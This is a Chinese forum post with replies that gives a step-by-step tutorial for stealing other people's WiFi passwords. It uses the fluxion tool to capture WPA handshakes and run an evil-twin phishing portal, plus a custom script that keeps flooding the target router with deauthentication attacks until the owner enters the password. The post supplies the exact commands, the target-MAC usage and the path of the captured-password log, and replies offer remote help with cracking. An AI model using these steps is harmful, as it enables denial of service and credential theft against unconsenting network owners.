【2022新版】使用fluxion软件WiFi钓鱼+脚本肉机攻击获取密码教程
本帖最后由 qsdelol12 于 2022-9-3 14:34 编辑[*]环境准备
虚拟机开机密码 :1 硬件装备:电脑一台,内存8G,硬盘空闲60G,网卡:两张2.4G频段网卡如3070,一张5G频段网卡,淘宝去买搜索【kali网卡5G】https://docimg2.docs.qq.com/image/9WUpAd68JyazKIl9h3dEow.png?w=316&h=314https://docimg10.docs.qq.com/image/BdytqhOsjfJCiafmNTu7CA.png?w=317&h=318
相关软件包下载:**************************************************************************************************「kali-i386-share-ver-no-script-2022」等文件 https://www.aliyundrive.com/s/F4Ya3e6gj5q 提取码: 3t3o点击链接保存,或者复制本段内容,打开「阿里云盘」**************************************************************************************************
由于阿里云盘分享限制,压缩包格式已经过伪装,下载后需用win10及以上系统运行以下解析程序解析出真正的格式【下载开始时和下载完成后别随便改文件名称,否则解析失败】https://docimg1.docs.qq.com/image/KycsYnHbvkBzVDSYUm5f8A.png?w=435&h=74解析后,解压直接用VMware打开该虚拟机即可,啥环境都已经安装好了,开箱即用
2.【破解步骤1创建钓鱼热点,此步骤网上教程一大把,以下为参考】连接网卡【钓鱼用3070网卡钓2.4G网络】https://docimg4.docs.qq.com/image/o-TBX_wfCjB5xn7JhNIGdw.png?w=982&h=4181. 进入虚拟机桌面鼠标左键双击【wifi-hack】文件夹,找到并打开【fluxion5.9】文件夹https://docimg1.docs.qq.com/image/2nGHD0cRTD-mu9N0kyreAQ.png?w=800&h=350https://docimg5.docs.qq.com/image/P5FCdmxcmu0r8Qvlikr6Xw.png?w=800&h=372https://docimg8.docs.qq.com/image/6_YqGmoWbngnl2Xd2ZLfXA.png?w=800&h=3502. 右键单击在这里打开终端https://docimg5.docs.qq.com/image/WhikPfiWKYRISBVrSppmmA.png?w=800&h=4063. 输入 : 回车提取root权限 sudo suhttps://docimg6.docs.qq.com/image/QAU4ew0kXb1nNfNGaVlNug.png?w=645&h=1394. 执行命令[./fluxion.sh]回车 ./fluxion.shhttps://docimg5.docs.qq.com/image/BvI3eyWzwF-sYXnGg70_kA.png?w=638&h=1065.这里选择 *********************************************************** 请选择一个攻击方式 ESSID: "" / Channel: BSSID: () 专属门户 创建一个“邪恶的双胞胎”接入点。 Handshake Snooper 检索WPA/WPA2加密散列。 返回
***********************************************************https://docimg2.docs.qq.com/image/dZiNV9x17eocDPvfHKJ7HQ.png?w=642&h=3446. 这里选择 *********************************************************** 选择要扫描的信道 扫描所有信道(2.4GHz) 扫描所有信道(5GHz) 扫描所有信道(2.4GHz & 5Ghz) 扫描指定信道 返回 **********************************************************https://docimg6.docs.qq.com/image/9qrS88czTPfhnFyE2spWKg.png?w=641&h=3047. 看见弹出扫描WiFi信息差不多了就关掉它https://docimg1.docs.qq.com/image/XLrjPdPbpep8EjIKU3sTxg.png?w=741&h=3928. 选择一个你要破解的WiFi的序号,回车【绿色代表有人上网,可轻松抓包】https://docimg1.docs.qq.com/image/Cgx0MFJLz2N_Nzn5xSAu0A.png?w=645&h=4109. 这里选择 跳过 ********************************************************** 为目标跟踪选择无线接口. 可能需要选择专用接口. 如果您不确定,请选择"跳过"! wlan0 Ralink Technology, Corp. RT5370 跳过 重试 返回 **********************************************************https://docimg9.docs.qq.com/image/ixBdfGGNEoFe8rLZIxuRDQ.png?w=646&h=32310. 这里选择 ********************************************************** 此攻击已经配置完毕 恢复攻击 重置攻击 *********************************************************https://docimg5.docs.qq.com/image/y8kzw6pG9Z1IYkk4iE9Gdg.png?w=807&h=29911. 这里选择 ********************************************************* 选择一种方式来检查握手包获取状态 监听模式 (被动) aireplay-ng 解除认证方式 (侵略性) mdk3 解除认证方式 (侵略性) 返回 ********************************************************https://docimg9.docs.qq.com/image/mgJIRSgFxWQf2RM44CrDGQ.png?w=753&h=42412. 这里选择 ******************************************************** 选择Hash的验证方法 pyrit 验证 aircrack-ng 验证 (不推荐) cowpatty 验证 (推荐用这个) 返回 ********************************************************https://docimg6.docs.qq.com/image/bG6qsaXSPnjUB9jBGMyaUw.png?w=752&h=42913. 这里选择 ******************************************************** 每隔多久检查一次握手包 每30秒钟 (推荐). 每60秒钟 每90秒钟 返回 *******************************************************https://docimg6.docs.qq.com/image/Gjm4AFr6pHD-s9l6K1FoFg.png?w=754&h=43414. 这里选择 ******************************************************* 如何进行验证? Asynchronously (fast systems only). Synchronously (推荐). 返回 *******************************************************https://docimg8.docs.qq.com/image/FnnCTdRsTy9sm6E8VOBDsg.png?w=752&h=41315. 等抓到包了,吧左下角的那个窗口手动关掉https://docimg3.docs.qq.com/image/2Un_xtk8xuc0tkyDMdF2zg.png?w=382&h=19216. 这里选择 ******************************************************* Handshake Snooper 正在进行攻击...... 选择启动攻击方式 退出 *******************************************************https://docimg4.docs.qq.com/image/Z7kFVDfqbki0i2cF5y4hCA.png?w=749&h=41217. 这里选择 ******************************************************* 请选择一个攻击方式 ESSID: "CU_NEFe" / WPA2 Channel:5 BSSID:34:78:39:D8:86:90 () 专属门户 创建一个“邪恶的双胞胎”接入点。 Handshake Snooper 检索WPA/WPA2加密散列。 返回 *******************************************************https://docimg3.docs.qq.com/image/J2BFTR2AsODM3-s9O7XjGA.png?w=753&h=40018. 这里输入回车 ******************************************************* Fluxion正在瞄准上面的接入点. 继续这个目标? *******************************************************https://docimg1.docs.qq.com/image/fwfXS5WhZgMPE6rBRwwtYA.png?w=754&h=32319. 这里选择 ******************************************************* 为目标跟踪选择无线接口. 可能需要选择专用接口. 如果您不确定,请选择"跳过"! wlan0 Ralink Technology, Corp. RT5370 跳过 重试 返回 ******************************************************https://docimg2.docs.qq.com/image/oA1y6cNYYJQRuvdi5AsSbQ.png?w=633&h=31820. 这里选择 ****************************************************** 此攻击已经配置完毕 恢复攻击 重置攻击 ******************************************************https://docimg5.docs.qq.com/image/y8kzw6pG9Z1IYkk4iE9Gdg.png?w=807&h=29921. 这里选择 ****************************************************** 为接入点选择一个接口 eth0 [-] Advanced Micro Devices, Inc. 79c970 (rev 10) wlan0 Ralink Technology, Corp. RT5370 重试 返回 ******************************************************https://docimg4.docs.qq.com/image/PSSgvVTH85eVWj1gn-weqQ.png?w=642&h=28822. 这里选择 ******************************************************** 选择一个接入点 ESSID: "CU_NEFe" / WPA2 Channel:5 BSSID:34:78:39:D8:86:90 () 流氓 AP - hostapd (推荐) 流氓 AP - airbase-ng (缓慢) 返回 ********************************************************https://docimg5.docs.qq.com/image/FdVcXampzR40RsfDl7mCWg.png?w=754&h=39723. 这里选择 ******************************************************** 发现目标热点的Hash文件. 你想要使用这个文件吗? 使用抓取到的hash文件 指定hash路径 握手包目录(重新扫描) 返回 *******************************************************https://docimg3.docs.qq.com/image/FOHUv_Wwr356RRSDG2VU0A.png?w=641&h=31324. 这里选择 ******************************************************* 选择Hash的验证方法 ESSID: "CU_NEFe" / WPA2 Channel:5 BSSID:34:78:39:D8:86:90 () pyrit 验证 aircrack-ng 验证 (不推荐) cowpatty 验证 (推荐用这个) 返回 *********************************************************https://docimg4.docs.qq.com/image/h2kc5-DbEqNHSoDIiIM3Iw.png?w=754&h=42025. 这里选择 ********************************************************* 选择钓鱼认证门户的SSL证书来源 创建SSL证书 检测SSL证书 (再次搜索) 没有证书 (disable SSL) 返回 *********************************************************https://docimg9.docs.qq.com/image/mkzVbTIU1_qwWoPNc6vFpg.png?w=643&h=28326. 这里选择 ********************************************************* 为流氓网络选择Internet连接类型 断开原网络 (推荐) 仿真 返回 *********************************************************https://docimg7.docs.qq.com/image/7KhTws14PakOJSiLOykc6A.png?w=639&h=26927. 这里输入回车 ********************************************************* 选择钓鱼热点的认证网页界面 ESSID: "CU_NEFe" / WPA2 Channel:5 BSSID:34:78:39:D8:86:90 () 通用认证网页 Arabic 通用认证网页 Bulgarian 通用认证网页 Chinese **********************************************************https://docimg8.docs.qq.com/image/RXwC1zW5MGH0MXTusZfbbg.png?w=752&h=35928. 等一小哈钓鱼WiFi就创建好了...[一共有6个小的弹窗] [如果这些弹窗消失了,表示钓鱼成功,密码会在屏幕上提示给你..]https://docimg10.docs.qq.com/image/qI6P8HlBijG3WrXiGYRPpw.png?w=754&h=40029. 钓鱼成功页面【密码位置:/home/kali/桌面/wifi-hack/fluxion-full-ver-qq-qun/fluxion-5.9/attacks/Captive\ Portal/netlog/xxx-xxx-xxx.log】https://docimg8.docs.qq.com/image/H3cKWSFg4jwNX-bOmpYttA.png?w=766&h=377
3.【破解步骤2运行自动化脚本攻击目标WiFi “双频路由器需要2台机器一起攻击,一台攻击2.4G,另一台攻击5G让目标主人完全无法使用WiFi”】 ********************************************************************************** * * * 本教程重头戏 * * 直接决定成功率 * * * **********************************************************************************连接网卡【攻击网卡:3070网卡攻击2.4G网络。5G网卡攻击5G网络】https://docimg4.docs.qq.com/image/o-TBX_wfCjB5xn7JhNIGdw.png?w=982&h=4181. 打开其它的虚拟机https://docimg8.docs.qq.com/image/Y93fMM-w_CGZeKu0msqfWQ.png?w=778&h=160
2. 鼠标左键单击桌面的 文件夹 ,,, 然后 鼠标右键单击在这里打开终端https://docimg6.docs.qq.com/image/Y-14TiF5s2s-4cHoLrz71g.png?w=769&h=258https://docimg5.docs.qq.com/image/Qkc_snCa9sNq7Uq7fOuWdA.png?w=766&h=3403. 输入 提取root权限 sudo suhttps://docimg9.docs.qq.com/image/_xHa2saeOrXfCIwjMYJW6g.png?w=642&h=1334. 查看网卡【无线网卡一般叫wlan0..wlan1...等等】 ip ahttps://docimg7.docs.qq.com/image/ciFwiN5MYPQNM4tEqcr-nQ.png?w=644&h=4045. 把无线网卡设置为监听模式 airmon-ng check kill airmon-ng start wlan0【备用命令】airmon-ng check killip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
https://docimg10.docs.qq.com/image/FpFKodFvLy92uaZcHpVHcA.png?w=640&h=3726. 再次查看网卡信息 ip a ******************************************************** 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 00:0c:29:4d:4c:33 brd ff:ff:ff:ff:ff:ff inet 192.168.255.128/24 brd 192.168.255.255 scope global dynamic noprefixroute eth0 valid_lft 953sec preferred_lft 953sec inet6 fe80::20c:29ff:fe4d:4c33/64 scope link noprefixroute valid_lft forever preferred_lft forever 6: wlan0mon: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UNKNOWN group default qlen 1000 link/ieee802.11/radiotap c8:3a:35:d0:c5:66 brd ff:ff:ff:ff:ff:ff ********************************************************https://docimg6.docs.qq.com/image/FXQqwq11lLJLMJXNzBM_jw.png?w=644&h=377
7. 查看攻击脚本 ll ********************************************************* 总用量 12 -rw-r--r-- 1 kali kali 108688月 27 16:58 hack_wifi_by_mdk_new.sh ********************************************************https://docimg7.docs.qq.com/image/5ykqS6OFi8aYwy285a7tmg.png?w=639&h=2088. 扫描一下WiFi信号,, 差不多了就键盘按下 组合键 结束扫描 这是扫描2.4G信号的命令 airodump-ng wlan0mon --band bg 这是扫描5G的 airodump-ng wlan0mon --band a ******************************************************* CH 14 ][ Elapsed: 12 s ][ 2022-08-27 18:11 BSSID PWRBeacons #Data, #/sCH MB ENC CIPHERAUTH ESSID 5C:DE:34:AE:D3:CD-72 1 1 0 6540 WPA2 CCMP PSKCMCC-fkVY34:78:39:D8:86:90-49 7 0 0 5130 WPA2 CCMP PSKCU_NEFe34:CE:00:2C:B9:A0-59 8 33 010130 WPA2 CCMP PSK🍇 ******************************************************找到你【破解步骤1】钓鱼的那个WiFi的MAC地址并复制下来https://docimg5.docs.qq.com/image/iY4lFhJ1mE3Gr3Qw_rS4Bw.png?w=642&h=344 9. 运行脚本开启自动化攻击 [注意网卡的名字,和上一步扫描出来的WiFi的MAC地址,,别写错了] bash hack_wifi_by_mdk_new.sh wlan0mon 02:3A:7C:6A:83:DBhttps://docimg7.docs.qq.com/image/EW88fd7aM7dHuq4zdNcgwg.png?w=644&h=15710. 这里输入的是探测对方路由器是否重启的间隔时间 [推荐 300 秒,,就是每5分钟探测一次对方路由器是否重启过,也可以自定义你喜欢的时间,但是建议必须大于60秒效果才好] ****************************************************** How long do you want zhe hack WIFI inervel time : ******************************************************https://docimg7.docs.qq.com/image/EW88fd7aM7dHuq4zdNcgwg.png?w=644&h=15711. 这里看你攻击的WiFi是2.4G还是5G,对应选择就行了【注意:5G需要支持5G的网卡,如8812au】 ****************************************************** Select one type what you want to hack ************************************ 1. 2.4G * 2. 5G * ************************************ Please select: 1 ******************************************************https://docimg5.docs.qq.com/image/YTC5TaksTBXLtJFuTPzz5A.png?w=642&h=13912. 到这里自动攻击就开始了,对方直接不能用WiFi了【重启路由器**也没用**】......https://docimg6.docs.qq.com/image/EZHrtc2xjWi8x-xq2UONiA.png?w=810&h=38513. 观察左上角的红色弹窗,如果在跑就表示一直在攻击。。。https://docimg7.docs.qq.com/image/9M92nuQwoANk4qvOgTvR5g.png?w=535&h=260
4.【破解步骤3定期观察钓鱼状态】 隔一段时间观察一下钓鱼的那台虚拟机,如果6个小的弹窗消失了,说明钓鱼成功,根据提示去看密码就行 .......记得回来把攻击脚本停止掉 小提示:看手机WiFi列表,如果钓鱼WiFi信号消失了也证明钓鱼成功,赶快去钓鱼那台虚拟机查看密码吧,记得关掉攻击脚本哦!!不然主人可能就要上门拜访您了https://docimg8.docs.qq.com/image/H3cKWSFg4jwNX-bOmpYttA.png?w=766&h=377
注意:这款破解手段比较残忍、粗暴、耗时。几小时,几分钟,几天不等。。。如果主人受不了攻击,破防了那会非常快得到密码
如何让主人快速破防?开启脚本无差别自动化攻击即可,即使主人重启路由器信道发生改变,该脚本也会捕获新的信道并重新攻击,迫使加快他上钩给出密码,这是这款脚本的可怕之处,定期嗅探目标路由器的信道变化并加以攻击,如果对方把路由器关机,那么这款脚本就会每10分钟嗅探一次,一旦嗅探到路由器开机就会立即开启攻击 !!!!!!
假如不使用脚本,主人重启路由器,信道变化了,那么你得手动调整信道进行洪水攻击,而且你不知道主人啥时候重启了路由器对不对,只能定期手动扫描WiFi看看信道变成了什么,再手动调整攻击命令使攻击生效,有了脚本就不需要你操心了,它会帮你解决自动化攻击,重启路由器也逃不过!!!!全过程都是自动化的~~~~
总结:巧用自动化攻击脚本,B站up主:【奥力元给力奥】让你不管到哪都能连接WiFi,欢迎━(*`∀′*)ノ亻!一键三连 !!!!!
温馨提醒:切勿将脚本用于恶意攻击等非法用途,否则一切后果自负!!!
hststb 发表于 2022-9-6 08:05
他也不知道,因为文章是剽窃的,
xterm的-e 参数后面跟的什么你了解吗?awk如何提取需要的字段你了解吗?shell如何进行流程控制你了解吗?airodump-ng的-w参数后面的路径下会生成几个文件,那些文件存放什么信息你了解过吗?mdk3与mdk4的-c参数默认切换信道时间分别是多少你了解过吗?
把以上基本的东西弄清楚再来bb 看不到图片啊,只有我是这样的吗? 无线爱好者学徒 发表于 2022-9-3 20:11
看不到图片啊,只有我是这样的吗?
新人贴,上传不了图片~~讲究看吧。。。功能还是很给力的呢 能远程安装帮助破解一个吗? 本帖最后由 qsdelol12 于 2022-9-6 18:05 编辑
无线爱好者66 发表于 2022-9-4 07:43
能远程安装帮助破解一个吗?
有网卡吗?3070两个,8812au一个 有,笔记本电脑自带网卡一个,3070和8187l各一个 电脑配置:win 10,内存8g,内置硬盘1t,还需要什么? 抓住了握手包,跑跑普通包和金刚包没出 无线爱好者66 发表于 2022-9-4 14:16
有,笔记本电脑自带网卡一个,3070和8187l各一个
加我扣 一七二五零九九六三八 hack_wifi_by_mdk_new.sh在哪里下载? 大弟呀,那个钓鱼软件不好用你没发现吗,再就是你伪装了WiFi也不好使,最关键的是把目标路由器打死才可以钓鱼, 本帖最后由 qsdelol12 于 2022-9-5 11:44 编辑
hststb 发表于 2022-9-5 10:51
大弟呀,那个钓鱼软件不好用你没发现吗,再就是你伪装了WiFi也不好使,最关键的是把目标路由器打死才可以钓 ...
已经自研了脚本解决,自动化攻击。话说你眼瞎吗?没看完文章就在这回复,无语!